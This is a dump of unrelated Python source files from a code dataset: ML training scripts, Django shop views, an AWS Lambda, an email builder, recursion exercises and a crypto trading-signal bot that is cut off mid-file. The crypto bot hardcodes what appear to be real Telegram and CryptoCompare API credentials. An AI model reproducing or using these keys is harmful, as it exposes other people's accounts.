num_inputs\n\n learning_rate = 0.01\n\n # placeholders\n\n x = tf.placeholder(tf.float32, shape=[None, num_inputs])\n\n # layers\n\n hidden = tf.contrib.layers.fully_connected(x, num_hidden, activation_fn=None)\n outputs = tf.contrib.layers.fully_connected(hidden, num_outputs, activation_fn=None)\n\n # loss\n loss = tf.reduce_mean(tf.square(outputs - x)) # mse\n\n # optimizer\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train = optimizer.minimize(loss)\n\n # init\n init = tf.global_variables_initializer()\n\n # session\n with tf.Session() as sess:\n\n sess.run(init)\n\n epochs = 1000\n\n for i in range(epochs):\n\n sess.run(train, feed_dict={x: inputs})\n\n lowered_dimension_outputs = hidden.eval(feed_dict={x: inputs})\n\n print(f'=> inputs shape = {inputs.shape}')\n print(f'=> lowered dimension outputs shape = {lowered_dimension_outputs.shape}')\n\n plt.scatter(lowered_dimension_outputs[:, 0], lowered_dimension_outputs[:, 1], c=labels)\n plt.savefig(os.path.join(save_dir, 'fig.png'))\n","sub_path":"tensorflow-basics/autoencoder_pca_30to2.py","file_name":"autoencoder_pca_30to2.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400614028","text":"import configparser\n\n# Original Repository: https://github.com/eibex/reaction-light\nprint(\"Author: eibex\")\nprint(\"Version: 0.0.1\")\nprint(\"License: MIT\\n\")\n\nprint(\"### ### Reaction Light Setup ### ###\")\nprint(\"If you would like more information about any of the steps, type 'help' as an answer.\")\nprint(\"If you would like to abort the 
configuration, close the program. No input will be written to file until the setup is complete.\")\n\nwhile True:\n    token = input(\"\\nPaste the token of your bot user (you can create one at: https://discordapp.com/developers/applications/)\\n\")\n    if token.lower() == \"help\":\n        print(\"\\nThe bot token looks like this: NDYzODUwNzM2OTk3MTA1NjY2.XSH7WA.w0WPO4tafLJ9rZoitBq1Q43AgnQ\\n\")\n        continue\n    else:\n        break\n\nprefix = input(\"\\nInsert the prefix of the bot (help not available for this)\\n\")\n\nwhile True:\n    logo = input(\"\\nPaste the URL to your preferred logo file (should end in *.png, *.jpg, *.webp, ...)\\n\")\n    if logo.lower() == \"help\":\n        print(\"\\nThe logo is the picture shown in the footer of the embeds.\\n\")\n        continue\n    else:\n        break\n\nwhile True:\n    admin_a = input(\"Paste the role ID of your admin role.\\n\")\n    if admin_a.lower() == \"help\":\n        print(\"\\nYou can find the ID of the role by right clicking it in server settings and clicking on 'Copy ID'. You need to enable Developer Mode on Discord.\\n\")\n        continue\n    else:\n        admin_b = input(\"\\nPaste the role ID of your second admin role. If none, type 0.\\n\")\n        admin_c = input(\"\\nPaste the role ID of your third admin role. If none, type 0.\\n\")\n        break\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\nconfig[\"server\"][\"token\"] = token\nconfig[\"server\"][\"prefix\"] = prefix\nconfig[\"server\"][\"logo\"] = logo\nconfig[\"server_role\"][\"admin_a\"] = admin_a\nconfig[\"server_role\"][\"admin_b\"] = admin_b\nconfig[\"server_role\"][\"admin_c\"] = admin_c\nwith open(\"config.ini\", \"w\") as f:\n    config.write(f)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556263650","text":"import argparse\nimport logging\nimport os\nimport paddle\nimport paddle.fluid as fluid\n\nfrom nets import bow_net\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description=\"Tower CTR example\")\n    parser.add_argument(\n        '--batch_size',\n        type=int,\n        default=32,\n        help=\"The size of mini-batch (default:32)\")\n    parser.add_argument(\n        '--thread_num',\n        type=int,\n        default=10,\n        help=\"thread num\")\n    parser.add_argument(\n        '--num_passes',\n        type=int,\n        default=10,\n        help=\"The number of passes to train (default: 10)\")\n    parser.add_argument(\n        '--model_output_dir',\n        type=str,\n        default='models',\n        help='The path for model to store (default: models)')\n\n    return parser.parse_args()\n\nclass Model(object):\n    def __init__(self):\n        self.label = fluid.layers.data(name=\"slot_1\", shape=[-1, 1],\n                                       dtype=\"int64\", lod_level=0,\n                                       append_batch_size=False)\n        self.user = []\n        self.item = []\n        for i in range(2, 70, 1):\n            self.user.append(fluid.layers.data(name=\"slot_%d\" % i, shape=[1],\n                             dtype=\"int64\", lod_level=1))\n        for j in range(70, 100, 1):  # use j, not i, so each item slot gets its own name\n            self.item.append(fluid.layers.data(name=\"slot_%d\" % j, shape=[1],\n                             dtype=\"int64\", lod_level=1))\n        self.avg_cost, prediction = bow_net(self.user, self.item, self.label)\n\n\ndef async_train(args):\n    model = Model()\n    optimizer = fluid.optimizer.SGD(learning_rate=1e-4)\n    optimizer.minimize(model.avg_cost)\n    place = fluid.CPUPlace()\n    exe = fluid.Executor(place)\n    exe.run(fluid.default_startup_program())\n    data_set = fluid.DataFeedDesc(\"ctr.proto\")\n    input_data_name = [model.label.name] + [x.name for x in model.user] + [x.name for x in model.item]\n    print(input_data_name)\n    data_set.set_use_slots(input_data_name)\n    
data_set.set_batch_size(args.batch_size)\n async_exe = fluid.AsyncExecutor()\n file_list = [\"./data_mod/%s\" % str(i) for i in os.listdir(\"./data_mod\")]\n epoch_num = args.num_passes\n thread = args.thread_num\n model_dir = args.model_output_dir\n if not os.path.isdir(args.model_output_dir):\n os.mkdir(args.model_output_dir)\n\n for i in range(epoch_num):\n async_exe.run(fluid.default_main_program(), data_set,\n file_list, thread, model.avg_cost, debug=True)\n #fluid.io.save_inference_model(model_dir, input_data_name, [loss], exe)\n\nif __name__ == '__main__':\n args = parse_args()\n async_train(args)\n","sub_path":"fluid/PaddleRec/ctr/train_with_async_exe.py","file_name":"train_with_async_exe.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"126077245","text":"import yeti\nimport asyncio\n\n\nclass SimpleAuto(yeti.Module):\n \"\"\"\n A simple drive-and-shoot autonomous mode.\n \"\"\"\n\n def module_init(self):\n self.drivetrain = self.engine.get_module(\"drivetrain\")\n self.cannon = self.engine.get_module(\"cannon\")\n\n async def autonomous_init(self):\n # Drive forward\n self.drivetrain.arcade_drive(.2, 0)\n await asyncio.sleep(1)\n\n # Stop\n self.drivetrain.arcade_drive(0, 0)\n await asyncio.sleep(.2)\n\n # Fire cannon\n await self.cannon.fire_cannon()\n","sub_path":"old code/Yeti-master/examples/basic_example/modules/simple_auto.py","file_name":"simple_auto.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31992920","text":"from django import template\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom rest_framework import status\n\nfrom .models import Product, Category, SubCategory, Purchase\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom .forms import RegistarForm, EditarPerfilForm, InserirProductoForm, InserirCategoriaForm, InserirSubCategoriaForm\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import ProductSerializer, CategorySerializer, SubCategorySerializer, ProductSubCategoryBrandSerializer, SubCategoryProductSerializer, CategorySubCategorySerializer\n\n\ndef loja(request):\n category = Category.objects.all()\n subcategory = SubCategory.objects.all()\n product = Product.objects.all()\n purchase = Purchase()\n purchase.user = request.GET.get('user')\n purchase.product = request.GET.get('product')\n search_term = ''\n\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n product = product.filter(name__icontains=search_term)\n\n context = {'subcategory': subcategory, 'product': product, 'category': category, 'search_term': search_term, 'purchase': purchase}\n return render(request, 'loja/index.html', context)\n\n\ndef product(request, product_id):\n subcategory_two = SubCategory.objects.all()\n category_two = Category.objects.all()\n product = get_object_or_404(Product, pk=product_id)\n\n\n return render(request, 'loja/product-description.html', {'product': product, 'subcategory_two': subcategory_two, 'category_two': category_two})\n\n\ndef subcategory(request, subcategory_id):\n subcategory = get_object_or_404(SubCategory, pk=subcategory_id)\n product = Product.objects.all().filter(subcategory_id=subcategory)\n category = Category.objects.all()\n 
subcategory_two = SubCategory.objects.all()\n category_two = Category.objects.all()\n context = {'subcategory': subcategory, 'product': product, 'category': category, 'subcategory_two': subcategory_two, 'category_two': category_two}\n return render(request, 'loja/subcategory.html', context)\n\n\ndef category_subcategory_allproducts(request, category_id):\n category = get_object_or_404(Category, pk=category_id)\n subcategory = SubCategory.objects.all().filter(category_id=category)\n product = Product.objects.all()\n category_two = Category.objects.all()\n subcategory_two = SubCategory.objects.all()\n context = {'category': category, 'subcategory': subcategory, 'product': product, 'category_two': category_two, 'subcategory_two': subcategory_two }\n return render(request, 'loja/category.html', context)\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistarForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/loja/inicio')\n else:\n form = RegistarForm()\n\n context = {'form': form}\n return render(request, 'loja/register-form.html', context)\n\n\ndef profile(request):\n context = {'user': request.user}\n return render(request, 'loja/profile.html', context)\n\n\ndef editar(request):\n if request.method == 'POST':\n # instance=request.user saber que é o user que queremos\n form = EditarPerfilForm(request.POST, instance=request.user)\n\n if form.is_valid():\n form.save()\n return redirect('/loja/perfil')\n else:\n form = EditarPerfilForm(instance=request.user)\n context = {'form': form}\n return render(request, 'loja/edit-profile.html', context)\n\n\ndef change_password(request):\n if request.method == 'POST':\n # instance=request.user saber que é o user que queremos\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n # Para nao dar erro ou Anomino User isto serve para dar update ao User\n update_session_auth_hash(request, form.user)\n return redirect('/loja/perfil')\n else:\n form = PasswordChangeForm(user=request.user)\n context = {'form': form}\n return render(request, 'loja/change-password.html', context)\n\n\ndef insert_product(request):\n form = InserirProductoForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n\n context = {'form': form}\n\n return render(request, 'loja/product-form.html', context)\n\n\ndef insert_category(request):\n form = InserirCategoriaForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n context = {'form': form}\n\n return render(request, 'loja/category-form.html', context)\n\ndef insert_subcategory(request):\n form = InserirSubCategoriaForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n context = {'form': form}\n\n return render(request, 'loja/subcategory-form.html', context)\n\ndef purchases(request):\n purchase = Purchase.objects.all()\n context = {'purchase': purchase}\n return render(request, 'loja/purchases.html', context)\n\n\ndef restframework_links(request):\n return render(request, 'loja/admin-restframework.html')\n\n\ndef insert(request):\n return render(request, 'loja/insert-forms.html')\n\n\n# Rest Framework\n# APIView Product, Category, SubCategory -> List\nclass ProductList(APIView):\n def get(self, request):\n product = Product.objects.all()\n serializer = ProductSerializer(product, many=True)\n return Response(serializer.data)\n\n\nclass CategoryList(APIView):\n def get(self, request):\n category = 
Category.objects.all()\n        serializer = CategorySerializer(category, many=True)\n        return Response(serializer.data)\n\n\nclass SubCategoryList(APIView):\n    def get(self, request):\n        subcategory = SubCategory.objects.all()\n        serializer = SubCategorySerializer(subcategory, many=True)\n        return Response(serializer.data)\n\n\n# APIView Product, Category, SubCategory -> Details\nclass ProductDetails(APIView):\n    def get(self, request, pk):\n        product = Product.objects.get(pk=pk)\n        serializer = ProductSubCategoryBrandSerializer(product, many=False)\n        return Response(serializer.data)\n\n    def post(self, request, pk):\n        product = Product.objects.get(pk=pk)\n        serializer = ProductSerializer(product, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, pk):\n        product = Product.objects.get(pk=pk)\n        serializer = ProductSerializer(product, many=False)\n        if product:\n            product.delete()\n            return Response({})\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CategoryDetails(APIView):\n    def get(self, request, pk):\n        category = Category.objects.get(pk=pk)\n        serializer = CategorySubCategorySerializer(category, many=False)\n        return Response(serializer.data)\n\n    def post(self, request, pk):\n        category = Category.objects.get(pk=pk)\n        serializer = CategorySubCategorySerializer(category, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, pk):\n        category = Category.objects.get(pk=pk)\n        serializer = CategorySubCategorySerializer(category, many=False)\n        if category:\n            category.delete()\n            return Response({})\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass SubCategoryDetails(APIView):\n    def get(self, request, pk):\n        subcategory = SubCategory.objects.get(pk=pk)\n        serializer = SubCategoryProductSerializer(subcategory, many=False)\n        return Response(serializer.data)\n\n    def post(self, request, pk):\n        subcategory = SubCategory.objects.get(pk=pk)\n        serializer = SubCategoryProductSerializer(subcategory, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, pk):\n        subcategory = SubCategory.objects.get(pk=pk)\n        serializer = SubCategoryProductSerializer(subcategory, many=False)\n        if subcategory:\n            subcategory.delete()\n            return Response({})\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)","sub_path":"GlobalPC/GlobalPC/loja/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"16020179","text":"# File: a4q1.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\n\ndef fibonacci(n):\n\t'''\n\tPurpose:\n\t\tCalculate the fibonacci sequence until the param n and print the series\n\t\tas it's computed. 
Example of the sequence: 0,1,1,2,3,5,8,13,21,34,55,...\n\tPre-conditions:\n\t\t:param n: the number of elements in the fibonacci sequence\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe nth element in the fibonacci series00\n\t'''\n\tif n in range(2):\n\t\treturn n\n\treturn fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef moosonacci(n):\n\t'''\n\tPurpose:\n\t\tCalculate the moosonacci sequence until the param n and print the series\n\t\tas its computed. Example of the sequence: 0,1,2,3,6,11,20,37,68,125...\n\tPre-conditions:\n\t\t:param n: the number of elements in the moosonacci sequence\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe nth element in the moosonacci series\n\t'''\n\tif n in range(3):\n\t\treturn n\n\treturn moosonacci(n - 1) + moosonacci(n - 2) + moosonacci(n - 3)\n\n\ndef count(s, c, i):\n\t'''\n\tPurpose:\n\t\tCount the occurences of the char 'c' in the string 's' after the index 'i'\n\tPre-conditions:\n\t\t:param s: the input string to check for occurences of 'c'\n\t\t:param c: the char to check for the occurences of in 's'\n\t\t:param i: the index at which to start looking for occurences of 'c'\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tNumber of times the char 'c' occurs in the string 's' starting form the\n\t\tindex 'i'\n\t'''\n\tif i not in range(len(s)):\n\t\treturn 0\n\tif s[i] is c:\n\t\ti += 1\n\t\treturn 1 + count(s, c, i)\n\telse:\n\t\ti += 1\n\t\treturn 0 + count(s, c, i)\n\n\n#########################################################################################\n\n\n# Set elements to compute here\nlimit = 20\n\nprint(\"testing fibonacci...\")\n\nfor i in range(limit):\n\tprint(i+1, \"->\", fibonacci(i))\n\nprint(\"testing moosonacci...\")\n\nfor i in range(limit):\n\tprint(i+1, \"->\", moosonacci(i))\n\nprint(\"testing count...\")\n\nstrings = ['fibonacci', 'moosonacci', 'limitless', 'colorful', 'riveting', 'blanchard']\nchars = ['i', 'a', 'o', 'e', 'u', 'l']\n\nfor s in strings:\n\tfor c in chars:\n\t\tfor i in range(0, 9, 2):\n\t\t\tprint('str:', s, 'chr:', c, 'idx:', i, '->', count(s, c, i))\n\n","sub_path":"assignments/a4/a4q1.py","file_name":"a4q1.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636320882","text":"\"\"\"\n-------------------------------------\n# -*- coding: utf-8 -*-\n# @Author : QG\n# @File : diameter_error.py\n# @Software: PyCharm\n-------------------------------------\n\"\"\"\n\nfrom joblib import Parallel\nfrom joblib import delayed\n\nfrom config import *\nfrom metrics import *\n\n\ndef _cal_diameter_error(d_max_len, d_max_len_arr, sd_max_len, sd_max_len_arr):\n \"\"\"\n\n calculate diameter error(DE)\n\n Args:\n d_max_len :\n d_max_len_arr :\n sd_max_len :\n sd_max_len_arr:\n\n Returns:\n\n \"\"\"\n ep_D = [0 for _ in range(20)]\n ep_SD = [0 for _ in range(20)]\n for item in d_max_len_arr:\n num = int(item / (d_max_len / 20))\n if num < 20:\n ep_D[num] += 1\n else:\n ep_D[19] += 1\n\n for item in sd_max_len_arr:\n num = int(item / (sd_max_len / 20))\n if num < 20:\n ep_SD[num] += 1\n else:\n ep_SD[19] += 1\n\n ep_D = np.array(ep_D, dtype='float32')\n ep_D /= np.sum(ep_D)\n ep_D = ep_D.tolist()\n ep_SD = np.array(ep_SD, dtype='float32')\n ep_SD /= np.sum(ep_SD)\n ep_SD = ep_SD.tolist()\n diameter_error = jsd(ep_D, ep_SD)\n\n return diameter_error\n\n\ndef cal_diameter_error(d_path, sd_path):\n \"\"\"\n\n calculate diameter error(DE) (main function)\n\n Args:\n d_path :\n sd_path:\n\n Returns:\n\n \"\"\"\n diameter, 
diameter_array = d_len(d_path)\n\n if not os.path.exists(USE_DATA):\n os.mkdir(USE_DATA)\n\n with open(f\"{USE_DATA}/diameter_array.txt\", \"r\") as output:\n diameter_array = eval(output.read())\n s_diameter, s_diameter_array = d_len(sd_path)\n\n diameter_error_ = _cal_diameter_error(diameter, diameter_array, s_diameter, s_diameter_array)\n\n print('Diameter Error: ', sd_path, diameter_error_)\n\n return diameter_error_\n\n\ndef count_d_path(d_path):\n \"\"\"\n\n calculate trajectory path\n\n Args:\n d_path :\n\n Returns:\n\n \"\"\"\n diameter_array = d_len(d_path)[1]\n\n if not os.path.exists(USE_DATA):\n os.mkdir(USE_DATA)\n with open(f\"{USE_DATA}/diameter_array.txt\", \"w\") as output:\n output.write(str(diameter_array))\n\n\nif __name__ == '__main__':\n count_d_path(f\"../data/{USE_DATA}/Trajectories/\")\n Parallel(n_jobs=4)(delayed(cal_diameter_error)(f\"../data/{USE_DATA}/Trajectories/\",\n f\"../data/{USE_DATA}/SD/sd_final_epsilon_{i}/\"\n ) for i in epsilon_list)\n","sub_path":"metrics/diameter_error.py","file_name":"diameter_error.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127381867","text":"'''\nScript to load players in given league into queue to be processed. Stores\nprocessed players into DynamoDB so that we don't process players multiple times in a day.\nDefault value will add players to queue once per day max, therefore only updating match details for that player once per\nday\n'''\nimport json\nimport datetime\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\n\nimport riotApiService\n\n\ndef lambda_handler(event, context):\n sqs_client = boto3.client('sqs')\n dynamo = boto3.resource('dynamodb')\n table = dynamo.Table('processedPlayers')\n\n player_entries = []\n\n # If no players supplied to add, get challenger players and add them to queue\n if 'playerIds' not in event:\n player_ids = riotApiService.get_player_ids_by_league(riotApiService.DEFAULT_LEAGUE, riotApiService.DEFAULT_QUEUE)\n\n for player in player_ids:\n player_entry = {'id': player}\n player_entries.append(player_entry)\n else:\n player_ids = event['playerIds']\n\n for playerId in player_ids:\n player_entry = {'id': playerId}\n player_entries.append(player_entry)\n\n for player_entry in player_entries:\n needs_processed = add_processed_player_to_dynamo(player_entry['id'], table)\n if needs_processed:\n sqs_client.send_message(QueueUrl='https://sqs.us-east-1.amazonaws.com/939727369643/playerEntries',\n MessageBody=json.dumps(player_entry))\n return {\"status\": \"Success\", \"numPlayersLoaded\": len(player_ids)}\n\n\n# Determine if player should be added to queue to check match history, returns try if player record was added or updated\ndef add_processed_player_to_dynamo(player_id, table):\n player_id = str(player_id)\n update_threshold_date = str(datetime.datetime.now() - datetime.timedelta(days=1))\n kce = Key('playerId').eq(player_id)\n fe = Attr('updatedAt').gt(update_threshold_date)\n existing_item = table.query(KeyConditionExpression=kce,\n FilterExpression=fe)['Items']\n if len(existing_item) == 0:\n item = {'playerId': player_id, 'updatedAt': str(datetime.datetime.now())}\n table.put_item(Item=item)\n return True\n else:\n print('Entry already exists')\n return 
False\n","sub_path":"lambdas/loadPlayersIntoQueue/loadPlayersIntoQueue.py","file_name":"loadPlayersIntoQueue.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406903246","text":"import mimetypes\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n## v:/workspace/HandlingEmail_Homework/python-logo.png\n\ndef sendemail(address, body, attachments=[]):\n msg = MIMEMultipart()\n msg['From'] = 'paul.refalo@gmail.com'\n msg['To'] = address\n msg['Subject'] = \"Python email system testing\"\n msg['Body'] = body\n msg.attach(MIMEText(body))\n \n for path in attachments:\n ctype, encoding = mimetypes.guess_type(path)\n if ctype is None or encoding is not None:\n # No guess could be made, or the file is encoded (compressed), so\n # use a generic bag-of-bits type.\n ctype = 'application/octet-stream'\n maintype, subtype = ctype.split('/', 1)\n if maintype == 'text':\n fp = open(path)\n # Note: we should handle calculating the charset\n att = MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n fp = open(path, 'rb')\n att = MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n fp = open(path, 'rb')\n att = MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n fp = open(path, 'rb')\n att = MIMEBase(maintype, subtype)\n att.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n encoders.encode_base64(msg)\n # Set the filename parameter\n msg.add_header('Content-Disposition', 'attachment', filename=path)\n msg.attach(att)\n \n return msg\n \n \nif __name__ == '__main__':\n #print(sendemail('paul.refalo@gmail.com', 'Body of the email', ['walt.txt']))\n \n print(sendemail('paul.refalo@gmail.com', 'Body of the email', ['walt.txt', 'logo.png']))\n \n #print(sendemail('paul.refalo@gmail.com', 'Body of the email', 'python-logo.png'))\n ","sub_path":"python2/HandlingEmail_Homework/src/Email12.py","file_name":"Email12.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345021945","text":"test_timer = 0\ntimer = 0\n#!/usr/bin/env python\n# coding: utf-8\n#Kütüphaneler\nimport os\nimport warnings\nwarnings.simplefilter(\"ignore\")\nimport pandas as pd\nimport numpy \nimport requests # veri çekme\nfrom datetime import datetime #tarih değişkenleri\nimport time\nimport talib # teknik analiz indikatörleri için \nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as pexp\nimport inspect\nimport databaseFile\n\nAPI_KEY = \"2012983454:AAFXcFFZs5oY6nUkhKOPUu8k02ZdqRHJA-Q\"\nimport telebot\nbot = telebot.TeleBot(API_KEY)\nchat_id = -541027529\nbot.config[\"api_key\"] = API_KEY\nprint('program is running..')\n\n\n\ni=0\nlast_buy_signal = {\"BTC\":0,\"ETH\":0,\"CAKE\":0,\"NEO\":0,\"BNB\":0,\"BAKE\":0,\"DOT\":0,\"EOS\":0,\"ETC\":0,\"ADA\":0,\"BCH\":0,\"LTC\":0,\"XRP\":0,\"DOGE\":0,\"SOL\":0,\"LUNA\":0}\nlast_sell_signal = {\"BTC\":0,\"ETH\":0,\"CAKE\":0,\"NEO\":0,\"BNB\":0,\"BAKE\":0,\"DOT\":0,\"EOS\":0,\"ETC\":0,\"ADA\":0,\"BCH\":0,\"LTC\":0,\"XRP\":0,\"DOGE\":0,\"SOL\":0,\"LUNA\":0}\nbuy_signal = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nsignal_time = []\nsell_signal = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nsymbols = 
[\"BTC\",\"ETH\",\"CAKE\",\"NEO\",\"BNB\",\"BAKE\",\"DOT\",\"EOS\",\"ETC\",\"ADA\",\"BCH\",\"LTC\",\"XRP\",\"DOGE\",\"SOL\",\"LUNA\"]\nyenicoin = [\"avax\",\"uni\",\"algo\",\"link\",\"atom\",\"icp\",\"matic\",\"one\",\"rose\",\"xlm\",\"trx\",\"xtz\",\"theta\",\"egld\",\"xmr\",\"aave\",\"miota\",\"btt\",\"dash\",\"chz\",\"mana\",\"enj\",\"bat\",\"rvn\",\"ont\",\"kava\",\"sxp\",\"dent\",\"sun\"]\nyenicoin1 = [stri.upper() for stri in yenicoin] \n[last_buy_signal.__setitem__(strii,0) for strii in yenicoin1]\n[last_sell_signal.__setitem__(strii,0) for strii in yenicoin1]\nbuy_signal.extend(list(numpy.zeros(len(yenicoin))))\nsell_signal.extend(list(numpy.zeros(len(yenicoin))))\nsymbols.extend(yenicoin1)\nprint('coin counter: ' + str(len(symbols)))\n\ndef lastReader():\n for item in symbols:\n last_buy_signal[item] = databaseFile.selectSignal(databaseFile.connector,item,\"buy\")\n for item in symbols:\n last_sell_signal[item] = databaseFile.selectSignal(databaseFile.connector,item,\"sell\")\ndef reshaper():\n symbols_infunc = [\"BTC: \",\"ETH: \",\"CAKE: \",\"NEO: \",\"BNB: \",\"BAKE: \",\"DOT: \",\"EOS: \",\"ETC: \",\"ADA: \",\"BCH: \",\"LTC: \",\"XRP: \",\"DOGE: \",\"SOL: \",\"LUNA: \",\"AVAX: \",\"UNI: \",\"ALGO: \",\"LINK: \",\"ATOM: \",\"ICP: \",\"MATIC: \",\"ONE: \",\"ROSE: \",\"XLM: \",\"TRX: \",\"XTZ: \",\"THETA: \",\"EGLD: \",\"XMR: \",\"AAVE: \",\"MIOTA: \",\"BTT: \",\"DASH: \",\"CHZ: \",\"MANA: \",\"ENJ: \",\"BAT: \",\"RVN: \",\"ONT: \",\"KAVA: \",\"SXP: \",\"DENT: \",\"SUN: \"]\n for i in range(0,len(symbols)):\n buy_signal[i] = str(databaseFile.selectTime(databaseFile.connector,symbols[i],\"sell\"))+\"---->\"+symbols_infunc[i] + str(databaseFile.selectSignal(databaseFile.connector,symbols[i],\"buy\"))\n with open(\"buy_signals.txt\", \"w\", encoding=\"utf-8\") as file:\n for item in buy_signal:\n file.write(str(item))\n file.write(\"\\n\") \n for i in range(0,len(symbols)):\n sell_signal[i] = str(databaseFile.selectTime(databaseFile.connector,symbols[i],\"sell\"))+\"---->\"+symbols_infunc[i] + str(databaseFile.selectSignal(databaseFile.connector,symbols[i],\"sell\"))\n with open(\"sell_signals.txt\", \"w\", encoding=\"utf-8\") as file:\n for item in sell_signal:\n file.write(str(item))\n file.write(\"\\n\")\ndef get_data(coin,money=\"USDT\",api = '114982364c3cb0a2410f7a8871ce4dff8af75a024ae9ca5500e413c11d9ed843',day_hour = \"hour\"):\n # print(coin,end=\": \")\n #api = input(\"Enter your api adress : \")\n #day_hour = input('Choose your time interval(day/hour) : ')\n frame = inspect.currentframe()\n global valuess\n args, _, _, valuess = inspect.getargvalues(frame)\n \n if day_hour == \"day\": \n url_day = \"https://min-api.cryptocompare.com/data/histoday\"\n load = {\"api_key\":api,\"fsym\":coin,\"tsym\":money,\"limit\":672}\n result = requests.get(url = url_day,params = load).json()\n global data_day\n data_day = pd.DataFrame(result[\"Data\"])\n #return data_day.iloc[:6,]\n if day_hour ==\"hour\":\n url_hour = \"https://min-api.cryptocompare.com/data/histohour\"\n load = {\"api_key\":api,\"fsym\":coin,\"tsym\":money,\"limit\":672}\n result = requests.get(url = url_hour,params = load).json()\n global data_hour\n data_hour = pd.DataFrame(result[\"Data\"])\n #return data_hour.iloc[:6,]\n\n \ndef date_transform(time):\n datetime1 = datetime.fromtimestamp(time);datetime1 = str(datetime1)\n datetime_son = datetime.strptime(datetime1,'%Y-%m-%d %H:%M:%S')\n return datetime_son\n\n\n\n\ndef get_volume(coin,money = \"USDT\",api = \"1989798748:AAHRBAP34mVJ1bIvCpRfgs17XTr_SegAtnU\",day_hour = 
\"hour\"):\n url_vol = \"https://min-api.cryptocompare.com/data/exchange/histohour\"\n\n api = \"114982364c3cb0a2410f7a8871ce4dff8af75a024ae9ca5500e413c11d9ed843\"\n load = {\n \"api_key\":api,\n \"fsym\":coin,\n \"tsym\":money,\n \"limit\":672}\n\n result = requests.get(url = url_vol,params= load).json()\n global volume\n volume = pd.DataFrame(result[\"Data\"])\n\n\n\n\nlastReader()\nwhile True:\n if time.localtime().tm_min==timer or time.localtime().tm_min==test_timer:\n print(\"*****************************************\")\n print(\"REQUESTING.......\")\n print(\"*****************************************\")\n for items in symbols:\n get_data(items)\n get_volume(items)\n \n #hacim datasının ana veriye eklenmesi\n data_hour[\"volume\"] = volume[\"volume\"]\n #VWMA\n data_hour[\"V*P\"] = data_hour[\"volume\"]*data_hour[\"close\"]\n data_hour[\"VWMA30\"]=data_hour[\"V*P\"].rolling(window = 30).sum()/data_hour[\"volume\"].rolling(window = 30).sum()\n #gereksiz kolonları şutlake\n #data_hour.drop([\"volumefrom\",\"volumeto\",\"conversionType\",\"conversionSymbol\",\"V*P\"],axis = 1,inplace = True)\n\n data_hour[\"time\"] = data_hour[\"time\"].apply(lambda x: date_transform(x))\n short_ema9 = talib.EMA(data_hour[\"close\"],9)\n ema_vwma_dict = 